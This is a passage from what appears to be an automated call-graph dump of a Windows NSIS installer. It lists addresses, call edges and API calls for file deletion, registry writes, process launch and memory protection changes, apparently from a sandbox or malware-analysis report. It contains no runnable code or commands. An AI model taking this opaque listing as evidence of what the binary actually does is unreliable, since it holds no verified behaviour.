calls 4860->4863 4864 403b33 4861->4864 4915 405f48 lstrcpynW 4862->4915 4863->4854 4866 403bc2 4864->4866 4867 403b3f ShowWindow LoadLibraryW 4864->4867 4868 4052c5 5 API calls 4866->4868 4869 403b65 GetClassInfoW 4867->4869 4870 403b5e LoadLibraryW 4867->4870 4871 403bc8 4868->4871 4872 403b79 GetClassInfoW RegisterClassW 4869->4872 4873 403b8f DialogBoxParamW 4869->4873 4870->4869 4875 403be4 4871->4875 4876 403bcc 4871->4876 4872->4873 4874 40140b 2 API calls 4873->4874 4874->4850 4877 40140b 2 API calls 4875->4877 4876->4850 4878 40140b 2 API calls 4876->4878 4877->4850 4878->4850 4879->4721 4880->4764 4881->4768 4883 403848 4882->4883 4884 40383e CloseHandle 4882->4884 4885 403852 CloseHandle 4883->4885 4886 40385c 4883->4886 4884->4883 4885->4886 4917 40388a 4886->4917 4889 4057d0 71 API calls 4890 40366c OleUninitialize 4889->4890 4890->4741 4890->4742 4891->4755 4892->4782 4894 4056f2 CloseHandle 4893->4894 4895 4056fe 4893->4895 4894->4895 4895->4782 4897 405bf0 GetTickCount GetTempFileNameW 4896->4897 4898 405c26 4897->4898 4899 403358 4897->4899 4898->4897 4898->4899 4899->4723 4900->4797 4901->4799 4902->4803 4903->4821 4904->4813 4905->4833 4907 403c09 4906->4907 4916 405e8f wsprintfW 4907->4916 4909 403c7a 4910 405f6a 18 API calls 4909->4910 4911 403c86 SetWindowTextW 4910->4911 4912 403ca2 4911->4912 4913 4039aa 4911->4913 4912->4913 4914 405f6a 18 API calls 4912->4914 4913->4838 4914->4912 4915->4840 4916->4909 4918 403898 4917->4918 4919 40389d FreeLibrary GlobalFree 4918->4919 4920 403861 4918->4920 4919->4919 4919->4920 4920->4889 5084 40155b 5085 40296d 5084->5085 5088 405e8f wsprintfW 5085->5088 5087 402972 5088->5087 5089 4038dd 5090 4038e8 5089->5090 5091 4038ec 5090->5091 5092 4038ef GlobalAlloc 5090->5092 5092->5091 5093 40165e 5094 402b3a 18 API calls 5093->5094 5095 401665 5094->5095 5096 402b3a 18 API calls 5095->5096 5097 40166e 5096->5097 5098 402b3a 18 API calls 5097->5098 5099 401677 MoveFileW 5098->5099 5100 401683 5099->5100 5101 40168a 5099->5101 5103 401423 25 API calls 5100->5103 5102 40628b 2 API calls 5101->5102 5105 402197 5101->5105 5104 401699 5102->5104 5103->5105 5104->5105 5106 405de2 40 API calls 5104->5106 5106->5100 5107 4023e0 5108 402c44 19 API calls 5107->5108 5109 4023ea 5108->5109 5110 402b3a 18 API calls 5109->5110 5111 4023f3 5110->5111 5112 4023fe RegQueryValueExW 5111->5112 5115 402793 5111->5115 5113 40241e 5112->5113 5114 402424 RegCloseKey 5112->5114 5113->5114 5118 405e8f wsprintfW 5113->5118 5114->5115 5118->5114 5119 401ce5 GetDlgItem GetClientRect 5120 402b3a 18 API calls 5119->5120 5121 401d17 LoadImageW SendMessageW 5120->5121 5122 401d35 DeleteObject 5121->5122 5123 4029c7 5121->5123 5122->5123 5124 405166 5125 405176 5124->5125 5126 40518a 5124->5126 5127 4051d3 5125->5127 5128 40517c 5125->5128 5129 405192 IsWindowVisible 5126->5129 5135 4051a9 5126->5135 5131 4051d8 CallWindowProcW 5127->5131 5132 4041e6 SendMessageW 5128->5132 5129->5127 5130 40519f 5129->5130 5137 404abc SendMessageW 5130->5137 5134 405186 5131->5134 5132->5134 5135->5131 5142 404b3c 5135->5142 5138 404b1b SendMessageW 5137->5138 5139 404adf GetMessagePos ScreenToClient SendMessageW 5137->5139 5141 404b13 5138->5141 5140 404b18 5139->5140 5139->5141 5140->5138 5141->5135 5151 405f48 lstrcpynW 5142->5151 5144 404b4f 5152 405e8f wsprintfW 5144->5152 5146 404b59 5147 40140b 2 API calls 5146->5147 5148 404b62 5147->5148 5153 405f48 lstrcpynW 5148->5153 5150 404b69 5150->5127 5151->5144 5152->5146 5153->5150 5154 4042e8 lstrlenW 5155 404307 5154->5155 5156 404309 WideCharToMultiByte 5154->5156 5155->5156 5164 100018a9 5165 100018cc 5164->5165 5166 100018ff GlobalFree 5165->5166 5167 10001911 5165->5167 5166->5167 5168 10001272 2 API calls 5167->5168 5169 10001a87 GlobalFree GlobalFree 5168->5169 5170 40206a 5171 402b3a 18 API calls 5170->5171 5172 402071 5171->5172 5173 402b3a 18 API calls 5172->5173 5174 40207b 5173->5174 5175 402b3a 18 API calls 5174->5175 5176 402084 5175->5176 5177 402b3a 18 API calls 5176->5177 5178 40208e 5177->5178 5179 402b3a 18 API calls 5178->5179 5180 402098 5179->5180 5181 4020ac CoCreateInstance 5180->5181 5182 402b3a 18 API calls 5180->5182 5185 4020cb 5181->5185 5182->5181 5183 401423 25 API calls 5184 402197 5183->5184 5185->5183 5185->5184 4249 40156b 4250 401584 4249->4250 4251 40157b ShowWindow 4249->4251 4252 401592 ShowWindow 4250->4252 4253 4029c7 4250->4253 4251->4250 4252->4253 5186 404b6e GetDlgItem GetDlgItem 5187 404bc0 7 API calls 5186->5187 5195 404dd9 5186->5195 5188 404c63 DeleteObject 5187->5188 5189 404c56 SendMessageW 5187->5189 5190 404c6c 5188->5190 5189->5188 5192 404ca3 5190->5192 5194 405f6a 18 API calls 5190->5194 5191 404ebd 5193 404f69 5191->5193 5202 404f16 SendMessageW 5191->5202 5225 404dcc 5191->5225 5196 40419a 19 API calls 5192->5196 5198 404f73 SendMessageW 5193->5198 5199 404f7b 5193->5199 5200 404c85 SendMessageW SendMessageW 5194->5200 5195->5191 5206 404abc 5 API calls 5195->5206 5229 404e4a 5195->5229 5197 404cb7 5196->5197 5201 40419a 19 API calls 5197->5201 5198->5199 5205 404fa4 5199->5205 5211 404f94 5199->5211 5212 404f8d ImageList_Destroy 5199->5212 5200->5190 5207 404cc5 5201->5207 5209 404f2b SendMessageW 5202->5209 5202->5225 5203 404201 8 API calls 5210 40515f 5203->5210 5204 404eaf SendMessageW 5204->5191 5208 405113 5205->5208 5228 404b3c 4 API calls 5205->5228 5233 404fdf 5205->5233 5206->5229 5214 404d9a GetWindowLongW SetWindowLongW 5207->5214 5221 404d15 SendMessageW 5207->5221 5223 404d94 5207->5223 5226 404d51 SendMessageW 5207->5226 5227 404d62 SendMessageW 5207->5227 5215 405125 ShowWindow GetDlgItem ShowWindow 5208->5215 5208->5225 5217 404f3e 5209->5217 5211->5205 5213 404f9d GlobalFree 5211->5213 5212->5211 5213->5205 5216 404db3 5214->5216 5215->5225 5218 404dd1 5216->5218 5219 404db9 ShowWindow 5216->5219 5222 404f4f SendMessageW 5217->5222 5238 4041cf SendMessageW 5218->5238 5237 4041cf SendMessageW 5219->5237 5221->5207 5222->5193 5223->5214 5223->5216 5225->5203 5226->5207 5227->5207 5228->5233 5229->5191 5229->5204 5230 4050e9 InvalidateRect 5230->5208 5231 4050ff 5230->5231 5239 4049d6 5231->5239 5232 40500d SendMessageW 5236 405023 5232->5236 5233->5232 5233->5236 5235 405097 SendMessageW SendMessageW 5235->5236 5236->5230 5236->5235 5237->5225 5238->5195 5240 4049f3 5239->5240 5241 405f6a 18 API calls 5240->5241 5242 404a28 5241->5242 5243 405f6a 18 API calls 5242->5243 5244 404a33 5243->5244 5245 405f6a 18 API calls 5244->5245 5246 404a64 lstrlenW wsprintfW SetDlgItemTextW 5245->5246 5246->5208 5247 4024ee 5248 4024f3 5247->5248 5249 40250c 5247->5249 5250 402b1d 18 API calls 5248->5250 5251 402512 5249->5251 5252 40253e 5249->5252 5257 4024fa 5250->5257 5253 402b3a 18 API calls 5251->5253 5254 402b3a 18 API calls 5252->5254 5255 402519 WideCharToMultiByte lstrlenA 5253->5255 5256 402545 lstrlenW 5254->5256 5255->5257 5256->5257 5258 402793 5257->5258 5259 402567 WriteFile 5257->5259 5259->5258 5260 4045ee 5261 404624 5260->5261 5262 4045fe 5260->5262 5264 404201 8 API calls 5261->5264 5263 40419a 19 API calls 5262->5263 5265 40460b SetDlgItemTextW 5263->5265 5266 404630 5264->5266 5265->5261 5267 4018ef 5268 401926 5267->5268 5269 402b3a 18 API calls 5268->5269 5270 40192b 5269->5270 5271 4057d0 71 API calls 5270->5271 5272 401934 5271->5272 5273 404970 5274 404980 5273->5274 5275 40499c 5273->5275 5284 405708 GetDlgItemTextW 5274->5284 5277 4049a2 SHGetPathFromIDListW 5275->5277 5278 4049cf 5275->5278 5280 4049b9 SendMessageW 5277->5280 5281 4049b2 5277->5281 5279 40498d SendMessageW 5279->5275 5280->5278 5282 40140b 2 API calls 5281->5282 5282->5280 5284->5279 5285 402770 5286 402b3a 18 API calls 5285->5286 5287 402777 FindFirstFileW 5286->5287 5288 40278a 5287->5288 5289 40279f 5287->5289 5290 4027a8 5289->5290 5293 405e8f wsprintfW 5289->5293 5294 405f48 lstrcpynW 5290->5294 5293->5290 5294->5288 5295 4014f1 SetForegroundWindow 5296 4029c7 5295->5296 5297 4018f2 5298 402b3a 18 API calls 5297->5298 5299 4018f9 5298->5299 5300 405724 MessageBoxIndirectW 5299->5300 5301 401902 5300->5301 4444 402573 4445 402b1d 18 API calls 4444->4445 4451 402582 4445->4451 4446 4026a0 4447 4025c8 ReadFile 4447->4446 4447->4451 4448 405c37 ReadFile 4448->4451 4449 4026a2 4456 405e8f wsprintfW 4449->4456 4450 402608 MultiByteToWideChar 4450->4451 4451->4446 4451->4447 4451->4448 4451->4449 4451->4450 4453 40262e SetFilePointer MultiByteToWideChar 4451->4453 4454 4026b3 4451->4454 4453->4451 4454->4446 4455 4026d4 SetFilePointer 4454->4455 4455->4446 4456->4446 5302 401df3 5303 402b3a 18 API calls 5302->5303 5304 401df9 5303->5304 5305 402b3a 18 API calls 5304->5305 5306 401e02 5305->5306 5307 402b3a 18 API calls 5306->5307 5308 401e0b 5307->5308 5309 402b3a 18 API calls 5308->5309 5310 401e14 5309->5310 5311 401423 25 API calls 5310->5311 5312 401e1b ShellExecuteW 5311->5312 5313 401e4c 5312->5313 5319 100016b6 5320 100016e5 5319->5320 5321 10001b18 22 API calls 5320->5321 5322 100016ec 5321->5322 5323 100016f3 5322->5323 5324 100016ff 5322->5324 5325 10001272 2 API calls 5323->5325 5326 10001726 5324->5326 5327 10001709 5324->5327 5330 100016fd 5325->5330 5328 10001750 5326->5328 5329 1000172c 5326->5329 5331 1000153d 3 API calls 5327->5331 5333 1000153d 3 API calls 5328->5333 5332 100015b4 3 API calls 5329->5332 5334 1000170e 5331->5334 5336 10001731 5332->5336 5333->5330 5335 100015b4 3 API calls 5334->5335 5337 10001714 5335->5337 5338 10001272 2 API calls 5336->5338 5339 10001272 2 API calls 5337->5339 5340 10001737 GlobalFree 5338->5340 5341 1000171a GlobalFree 5339->5341 5340->5330 5342 1000174b GlobalFree 5340->5342 5341->5330 5342->5330 5343 10002238 5344 10002296 5343->5344 5346 100022cc 5343->5346 5345 100022a8 GlobalAlloc 5344->5345 5344->5346 5345->5344 4682 4026f9 4683 402700 4682->4683 4686 402972 4682->4686 4684 402b1d 18 API calls 4683->4684 4685 40270b 4684->4685 4687 402712 SetFilePointer 4685->4687 4687->4686 4688 402722 4687->4688 4690 405e8f wsprintfW 4688->4690 4690->4686 5347 1000103d 5348 1000101b 5 API calls 5347->5348 5349 10001056 5348->5349 5350 402c7f 5351 402c91 SetTimer 5350->5351 5352 402caa 5350->5352 5351->5352 5353 402cf8 5352->5353 5354 402cfe MulDiv 5352->5354 5355 402cb8 wsprintfW SetWindowTextW SetDlgItemTextW 5354->5355 5355->5353 5357 4014ff 5358 401507 5357->5358 5360 40151a 5357->5360 5359 402b1d 18 API calls 5358->5359 5359->5360 5361 401000 5362 401037 BeginPaint GetClientRect 5361->5362 5363 40100c DefWindowProcW 5361->5363 5364 4010f3 5362->5364 5366 401179 5363->5366 5367 401073 CreateBrushIndirect FillRect DeleteObject 5364->5367 5368 4010fc 5364->5368 5367->5364 5369 401102 CreateFontIndirectW 5368->5369 5370 401167 EndPaint 5368->5370 5369->5370 5371 401112 6 API calls 5369->5371 5370->5366 5371->5370 5372 401a00 5373 402b3a 18 API calls 5372->5373 5374 401a09 ExpandEnvironmentStringsW 5373->5374 5375 401a1d 5374->5375 5377 401a30 5374->5377 5376 401a22 lstrcmpW 5375->5376 5375->5377 5376->5377 5378 401b01 5379 402b3a 18 API calls 5378->5379 5380 401b08 5379->5380 5381 402b1d 18 API calls 5380->5381 5382 401b11 wsprintfW 5381->5382 5383 4029c7 5382->5383 4246 100027c7 4247 10002817 4246->4247 4248 100027d7 VirtualProtect 4246->4248 4248->4247 5391 401f08 5392 402b3a 18 API calls 5391->5392 5393 401f0f GetFileVersionInfoSizeW 5392->5393 5394 401f36 GlobalAlloc 5393->5394 5395 401f8c 5393->5395 5394->5395 5396 401f4a GetFileVersionInfoW 5394->5396 5396->5395 5397 401f59 VerQueryValueW 5396->5397 5397->5395 5398 401f72 5397->5398 5402 405e8f wsprintfW 5398->5402 5400 401f7e 5403 405e8f wsprintfW 5400->5403 5402->5400 5403->5395 5404 401c8e 5405 402b1d 18 API calls 5404->5405 5406 401c94 IsWindow 5405->5406 5407 4019f0 5406->5407 5408 1000164f 5409 10001516 GlobalFree 5408->5409 5412 10001667 5409->5412 5410 100016ad GlobalFree 5411 10001682 5411->5410 5412->5410 5412->5411 5413 10001699 VirtualFree 5412->5413 5413->5410 5421 401491 5422 4051f2 25 API calls 5421->5422 5423 401498 5422->5423 4484 402295 4485 402b3a 18 API calls 4484->4485 4486 4022a4 4485->4486 4487 402b3a 18 API calls 4486->4487 4488 4022ad 4487->4488 4489 402b3a 18 API calls 4488->4489 4490 4022b7 GetPrivateProfileStringW 4489->4490 4496 401f98 4497 40205c 4496->4497 4498 401faa 4496->4498 4501 401423 25 API calls 4497->4501 4499 402b3a 18 API calls 4498->4499 4500 401fb1 4499->4500 4502 402b3a 18 API calls 4500->4502 4503 402197 4501->4503 4504 401fba 4502->4504 4505 401fd0 LoadLibraryExW 4504->4505 4506 401fc2 GetModuleHandleW 4504->4506 4505->4497 4507 401fe1 4505->4507 4506->4505 4506->4507 4519 40631e WideCharToMultiByte 4507->4519 4510 401ff2 4513 402011 4510->4513 4514 401ffa 4510->4514 4511 40202b 4512 4051f2 25 API calls 4511->4512 4515 402002 4512->4515 4522 10001759 4513->4522 4564 401423 4514->4564 4515->4503 4517 40204e FreeLibrary 4515->4517 4517->4503 4520 406348 GetProcAddress 4519->4520 4521 401fec 4519->4521 4520->4521 4521->4510 4521->4511 4523 10001789 4522->4523 4567 10001b18 4523->4567 4525 10001790 4526 100018a6 4525->4526 4527 100017a1 4525->4527 4528 100017a8 4525->4528 4526->4515 4616 10002286 4527->4616 4599 100022d0 4528->4599 4533 100017cd 4534 1000180c 4533->4534 4535 100017ee 4533->4535 4539 10001812 4534->4539 4540 1000184e 4534->4540 4629 100024a9 4535->4629 4537 100017be 4538 100017c4 4537->4538 4543 100017cf 4537->4543 4538->4533 4610 100028a4 4538->4610 4545 100015b4 3 API calls 4539->4545 4547 100024a9 10 API calls 4540->4547 4541 100017d7 4541->4533 4626 10002b5f 4541->4626 4542 100017f4 4640 100015b4 4542->4640 4620 10002645 4543->4620 4550 10001828 4545->4550 4551 10001840 4547->4551 4554 100024a9 10 API calls 4550->4554 4555 10001895 4551->4555 4651 1000246c 4551->4651 4553 100017d5 4553->4533 4554->4551 4555->4526 4559 1000189f GlobalFree 4555->4559 4559->4526 4561 10001881 4561->4555 4655 1000153d wsprintfW 4561->4655 4562 1000187a FreeLibrary 4562->4561 4565 4051f2 25 API calls 4564->4565 4566 401431 4565->4566 4566->4515 4658 1000121b GlobalAlloc 4567->4658 4569 10001b3c 4659 1000121b GlobalAlloc 4569->4659 4571 10001d7a GlobalFree GlobalFree GlobalFree 4572 10001d97 4571->4572 4583 10001de1 4571->4583 4574 100020ee 4572->4574 4582 10001dac 4572->4582 4572->4583 4573 10001b47 4573->4571 4575 10001c1d GlobalAlloc 4573->4575 4577 10001c86 GlobalFree 4573->4577 4580 10001c68 lstrcpyW 4573->4580 4573->4583 4584 10001c72 lstrcpyW 4573->4584 4588 10002048 4573->4588 4592 10001f37 GlobalFree 4573->4592 4595 1000122c 2 API calls 4573->4595 4597 10001cc4 4573->4597 4665 1000121b GlobalAlloc 4573->4665 4576 10002110 GetModuleHandleW 4574->4576 4574->4583 4575->4573 4578 10002121 LoadLibraryW 4576->4578 4579 10002136 4576->4579 4577->4573 4578->4579 4578->4583 4666 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4579->4666 4580->4584 4582->4583 4662 1000122c 4582->4662 4583->4525 4584->4573 4585 10002188 4585->4583 4586 10002195 lstrlenW 4585->4586 4667 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4586->4667 4588->4583 4591 10002090 lstrcpyW 4588->4591 4591->4583 4592->4573 4593 10002148 4593->4585 4598 10002172 GetProcAddress 4593->4598 4594 100021af 4594->4583 4595->4573 4597->4573 4660 1000158f GlobalSize GlobalAlloc 4597->4660 4598->4585 4601 100022e8 4599->4601 4600 1000122c GlobalAlloc lstrcpynW 4600->4601 4601->4600 4603 10002415 GlobalFree 4601->4603 4605 100023d3 lstrlenW 4601->4605 4606 100023ba GlobalAlloc CLSIDFromString 4601->4606 4607 1000238f GlobalAlloc WideCharToMultiByte 4601->4607 4669 100012ba 4601->4669 4603->4601 4604 100017ae 4603->4604 4604->4533 4604->4537 4604->4541 4605->4603 4609 100023de 4605->4609 4606->4603 4607->4603 4609->4603 4673 100025d9 4609->4673 4612 100028b6 4610->4612 4611 1000295b EnumWindows 4613 10002979 4611->4613 4612->4611 4614 10002a75 4613->4614 4615 10002a6a GetLastError 4613->4615 4614->4533 4615->4614 4617 10002296 4616->4617 4619 100017a7 4616->4619 4618 100022a8 GlobalAlloc 4617->4618 4617->4619 4618->4617 4619->4528 4624 10002661 4620->4624 4621 100026b2 GlobalAlloc 4625 100026d4 4621->4625 4622 100026c5 4623 100026ca GlobalSize 4622->4623 4622->4625 4623->4625 4624->4621 4624->4622 4625->4553 4627 10002b6a 4626->4627 4628 10002baa GlobalFree 4627->4628 4676 1000121b GlobalAlloc 4629->4676 4631 10002530 StringFromGUID2 4634 100024b3 4631->4634 4632 10002541 lstrcpynW 4632->4634 4633 1000250b MultiByteToWideChar 4633->4634 4634->4631 4634->4632 4634->4633 4635 10002554 wsprintfW 4634->4635 4636 10002571 GlobalFree 4634->4636 4637 100025ac GlobalFree 4634->4637 4638 10001272 2 API calls 4634->4638 4677 100012e1 4634->4677 4635->4634 4636->4634 4637->4542 4638->4634 4681 1000121b GlobalAlloc 4640->4681 4642 100015ba 4643 100015c7 lstrcpyW 4642->4643 4645 100015e1 4642->4645 4646 100015fb 4643->4646 4645->4646 4647 100015e6 wsprintfW 4645->4647 4648 10001272 4646->4648 4647->4646 4649 100012b5 GlobalFree 4648->4649 4650 1000127b GlobalAlloc lstrcpynW 4648->4650 4649->4551 4650->4649 4652 10001861 4651->4652 4653 1000247a 4651->4653 4652->4561 4652->4562 4653->4652 4654 10002496 GlobalFree 4653->4654 4654->4653 4656 10001272 2 API calls 4655->4656 4657 1000155e 4656->4657 4657->4555 4658->4569 4659->4573 4661 100015ad 4660->4661 4661->4597 4668 1000121b GlobalAlloc 4662->4668 4664 1000123b lstrcpynW 4664->4583 4665->4573 4666->4593 4667->4594 4668->4664 4670 100012c1 4669->4670 4671 1000122c 2 API calls 4670->4671 4672 100012df 4671->4672 4672->4601 4674 100025e7 VirtualAlloc 4673->4674 4675 1000263d 4673->4675 4674->4675 4675->4609 4676->4634 4678 100012ea 4677->4678 4679 1000130c 4677->4679 4678->4679 4680 100012f0 lstrcpyW 4678->4680 4679->4634 4680->4679 4681->4642 5424 10001058 5426 10001074 5424->5426 5425 100010dd 5426->5425 5427 10001092 5426->5427 5428 10001516 GlobalFree 5426->5428 5429 10001516 GlobalFree 5427->5429 5428->5427 5430 100010a2 5429->5430 5431 100010b2 5430->5431 5432 100010a9 GlobalSize 5430->5432 5433 100010b6 GlobalAlloc 5431->5433 5434 100010c7 5431->5434 5432->5431 5435 1000153d 3 API calls 5433->5435 5436 100010d2 GlobalFree 5434->5436 5435->5434 5436->5425 5437 401718 5438 402b3a 18 API calls 5437->5438 5439 40171f SearchPathW 5438->5439 5440 40173a 5439->5440 4921 40159b 4922 402b3a 18 API calls 4921->4922 4923 4015a2 SetFileAttributesW 4922->4923 4924 4015b4 4923->4924 5441 40659d 5442 406421 5441->5442 5443 406d8c 5442->5443 5444 4064a2 GlobalFree 5442->5444 5445 4064ab GlobalAlloc 5442->5445 5446 406522 GlobalAlloc 5442->5446 5447 406519 GlobalFree 5442->5447 5444->5445 5445->5442 5445->5443 5446->5442 5446->5443 5447->5446 5448 40149e 5449 4014ac PostQuitMessage 5448->5449 5450 40223e 5448->5450 5449->5450 5451 4021a0 5452 402b3a 18 API calls 5451->5452 5453 4021a6 5452->5453 5454 402b3a 18 API calls 5453->5454 5455 4021af 5454->5455 5456 402b3a 18 API calls 5455->5456 5457 4021b8 5456->5457 5458 40628b 2 API calls 5457->5458 5459 4021c1 5458->5459 5460 4021d2 lstrlenW lstrlenW 5459->5460 5464 4021c5 5459->5464 5462 4051f2 25 API calls 5460->5462 5461 4051f2 25 API calls 5465 4021cd 5461->5465 5463 402210 SHFileOperationW 5462->5463 5463->5464 5463->5465 5464->5461 5464->5465 5466 100010e1 5475 10001111 5466->5475 5467 100011d8 GlobalFree 5468 100012ba 2 API calls 5468->5475 5469 100011d3 5469->5467 5470 10001164 GlobalAlloc 5470->5475 5471 100011f8 GlobalFree 5471->5475 5472 10001272 2 API calls 5474 100011c4 GlobalFree 5472->5474 5473 100012e1 lstrcpyW 5473->5475 5474->5475 5475->5467 5475->5468 5475->5469 5475->5470 5475->5471 5475->5472 5475->5473 5475->5474 5476 401b22 5477 401b73 5476->5477 5478 401b2f 5476->5478 5479 401b78 5477->5479 5480 401b9d GlobalAlloc 5477->5480 5483 401b46 5478->5483 5486 401bb8 5478->5486 5492 40223e 5479->5492 5497 405f48 lstrcpynW 5479->5497 5482 405f6a 18 API calls 5480->5482 5481 405f6a 18 API calls 5484 402238 5481->5484 5482->5486 5495 405f48 lstrcpynW 5483->5495 5490 405724 MessageBoxIndirectW 5484->5490 5486->5481 5486->5492 5488 401b8a GlobalFree 5488->5492 5489 401b55 5496 405f48 lstrcpynW 5489->5496 5490->5492 5493 401b64 5498 405f48 lstrcpynW 5493->5498 5495->5489 5496->5493 5497->5488 5498->5492 5499 4029a2 SendMessageW 5500 4029bc InvalidateRect 5499->5500 5501 4029c7 5499->5501 5500->5501 4086 401924 4087 401926 4086->4087 4092 402b3a 4087->4092 4093 402b46 4092->4093 4094 405f6a 18 API calls 4093->4094 4096 402b67 4094->4096 4095 40192b 4098 4057d0 4095->4098 4096->4095 4097 4061dc 5 API calls 4096->4097 4097->4095 4137 405a9b 4098->4137 4101 4057f8 DeleteFileW 4103 401934 4101->4103 4102 40580f 4105 40592f 4102->4105 4151 405f48 lstrcpynW 4102->4151 4105->4103 4181 40628b FindFirstFileW 4105->4181 4106 405835 4107 405848 4106->4107 4108 40583b lstrcatW 4106->4108 4152 4059df lstrlenW 4107->4152 4109 40584e 4108->4109 4112 40585e lstrcatW 4109->4112 4114 405869 lstrlenW FindFirstFileW 4109->4114 4112->4114 4114->4105 4121 40588b 4114->4121 4115 405958 4184 405993 lstrlenW CharPrevW 4115->4184 4118 405912 FindNextFileW 4118->4121 4122 405928 FindClose 4118->4122 4119 405788 5 API calls 4123 40596a 4119->4123 4121->4118 4135 4058d3 4121->4135 4156 405f48 lstrcpynW 4121->4156 4122->4105 4124 405984 4123->4124 4125 40596e 4123->4125 4127 4051f2 25 API calls 4124->4127 4125->4103 4128 4051f2 25 API calls 4125->4128 4127->4103 4130 40597b 4128->4130 4129 4057d0 64 API calls 4129->4135 4132 405de2 40 API calls 4130->4132 4131 4051f2 25 API calls 4131->4118 4133 405982 4132->4133 4133->4103 4135->4118 4135->4129 4135->4131 4157 405788 4135->4157 4165 4051f2 4135->4165 4176 405de2 4135->4176 4187 405f48 lstrcpynW 4137->4187 4139 405aac 4188 405a3e CharNextW CharNextW 4139->4188 4142 4057f0 4142->4101 4142->4102 4143 4061dc 5 API calls 4149 405ac2 4143->4149 4144 405af3 lstrlenW 4145 405afe 4144->4145 4144->4149 4147 405993 3 API calls 4145->4147 4146 40628b 2 API calls 4146->4149 4148 405b03 GetFileAttributesW 4147->4148 4148->4142 4149->4142 4149->4144 4149->4146 4150 4059df 2 API calls 4149->4150 4150->4144 4151->4106 4153 4059ed 4152->4153 4154 4059f3 CharPrevW 4153->4154 4155 4059ff 4153->4155 4154->4153 4154->4155 4155->4109 4156->4121 4194 405b8f GetFileAttributesW 4157->4194 4159 4057b5 4159->4135 4161 4057a3 RemoveDirectoryW 4163 4057b1 4161->4163 4162 4057ab DeleteFileW 4162->4163 4163->4159 4164 4057c1 SetFileAttributesW 4163->4164 4164->4159 4166 40520d 4165->4166 4167 4052af 4165->4167 4168 405229 lstrlenW 4166->4168 4169 405f6a 18 API calls 4166->4169 4167->4135 4170 405252 4168->4170 4171 405237 lstrlenW 4168->4171 4169->4168 4173 405265 4170->4173 4174 405258 SetWindowTextW 4170->4174 4171->4167 4172 405249 lstrcatW 4171->4172 4172->4170 4173->4167 4175 40526b SendMessageW SendMessageW SendMessageW 4173->4175 4174->4173 4175->4167 4197 4062b2 GetModuleHandleA 4176->4197 4180 405e0a 4180->4135 4182 4062a1 FindClose 4181->4182 4183 405954 4181->4183 4182->4183 4183->4103 4183->4115 4185 40595e 4184->4185 4186 4059af lstrcatW 4184->4186 4185->4119 4186->4185 4187->4139 4189 405a5b 4188->4189 4192 405a6d 4188->4192 4191 405a68 CharNextW 4189->4191 4189->4192 4190 405a91 4190->4142 4190->4143 4191->4190 4192->4190 4193 4059c0 CharNextW 4192->4193 4193->4192 4195 405ba1 SetFileAttributesW 4194->4195 4196 405794 4194->4196 4195->4196 4196->4159 4196->4161 4196->4162 4198 4062d9 GetProcAddress 4197->4198 4199 4062ce LoadLibraryA 4197->4199 4200 405de9 4198->4200 4199->4198 4199->4200 4200->4180 4201 405c66 lstrcpyW 4200->4201 4202 405cb5 GetShortPathNameW 4201->4202 4203 405c8f 4201->4203 4205 405cca 4202->4205 4206 405ddc 4202->4206 4226 405bb4 GetFileAttributesW CreateFileW 4203->4226 4205->4206 4208 405cd2 wsprintfA 4205->4208 4206->4180 4207 405c99 CloseHandle GetShortPathNameW 4207->4206 4209 405cad 4207->4209 4210 405f6a 18 API calls 4208->4210 4209->4202 4209->4206 4211 405cfa 4210->4211 4227 405bb4 GetFileAttributesW CreateFileW 4211->4227 4213 405d07 4213->4206 4214 405d16 GetFileSize GlobalAlloc 4213->4214 4215 405dd5 CloseHandle 4214->4215 4216 405d38 4214->4216 4215->4206 4228 405c37 ReadFile 4216->4228 4221 405d57 lstrcpyA 4224 405d79 4221->4224 4222 405d6b 4223 405b19 4 API calls 4222->4223 4223->4224 4225 405db0 SetFilePointer WriteFile GlobalFree 4224->4225 4225->4215 4226->4207 4227->4213 4229 405c55 4228->4229 4229->4215 4230 405b19 lstrlenA 4229->4230 4231 405b5a lstrlenA 4230->4231 4232 405b62 4231->4232 4233 405b33 lstrcmpiA 4231->4233 4232->4221 4232->4222 4233->4232 4234 405b51 CharNextA 4233->4234 4234->4231 5502 402224 5503 40223e 5502->5503 5504 40222b 5502->5504 5505 405f6a 18 API calls 5504->5505 5506 402238 5505->5506 5507 405724 MessageBoxIndirectW 5506->5507 5507->5503 5515 402729 5516 402730 5515->5516 5517 4029c7 5515->5517 5518 402736 FindClose 5516->5518 5518->5517 5519 401cab 5520 402b1d 18 API calls 5519->5520 5521 401cb2 5520->5521 5522 402b1d 18 API calls 5521->5522 5523 401cba GetDlgItem 5522->5523 5524 4024e8 5523->5524 5525 4042ae lstrcpynW lstrlenW 5526 4016af 5527 402b3a 18 API calls 5526->5527 5528 4016b5 GetFullPathNameW 5527->5528 5529 4016f1 5528->5529 5530 4016cf 5528->5530 5531 401706 GetShortPathNameW 5529->5531 5532 4029c7 5529->5532 5530->5529 5533 40628b 2 API calls 5530->5533 5531->5532 5534 4016e1 5533->5534 5534->5529 5536 405f48 lstrcpynW 5534->5536 5536->5529 4254 402331 4255 402337 4254->4255 4256 402b3a 18 API calls 4255->4256 4257 402349 4256->4257 4258 402b3a 18 API calls 4257->4258 4259 402353 RegCreateKeyExW 4258->4259 4260 40237d 4259->4260 4262 402793 4259->4262 4261 402398 4260->4261 4263 402b3a 18 API calls 4260->4263 4266 402b1d 18 API calls 4261->4266 4267 4023a4 4261->4267 4265 40238e lstrlenW 4263->4265 4264 4023bf RegSetValueExW 4269 4023d5 RegCloseKey 4264->4269 4265->4261 4266->4267 4267->4264 4271 403062 4267->4271 4269->4262 4272 403072 SetFilePointer 4271->4272 4273 40308e 4271->4273 4272->4273 4286 40317d GetTickCount 4273->4286 4276 405c37 ReadFile 4277 4030ae 4276->4277 4278 40317d 43 API calls 4277->4278 4285 403139 4277->4285 4279 4030c5 4278->4279 4280 4030d5 4279->4280 4281 40313f ReadFile 4279->4281 4279->4285 4283 405c37 ReadFile 4280->4283 4284 403108 WriteFile 4280->4284 4280->4285 4281->4285 4283->4280 4284->4280 4284->4285 4285->4264 4287 4032e7 4286->4287 4288 4031ac 4286->4288 4289 402d1a 33 API calls 4287->4289 4299 40330f SetFilePointer 4288->4299 4295 403095 4289->4295 4291 4031b7 SetFilePointer 4297 4031dc 4291->4297 4295->4276 4295->4285 4296 403271 WriteFile 4296->4295 4296->4297 4297->4295 4297->4296 4298 4032c8 SetFilePointer 4297->4298 4300 4032f9 4297->4300 4303 4063ee 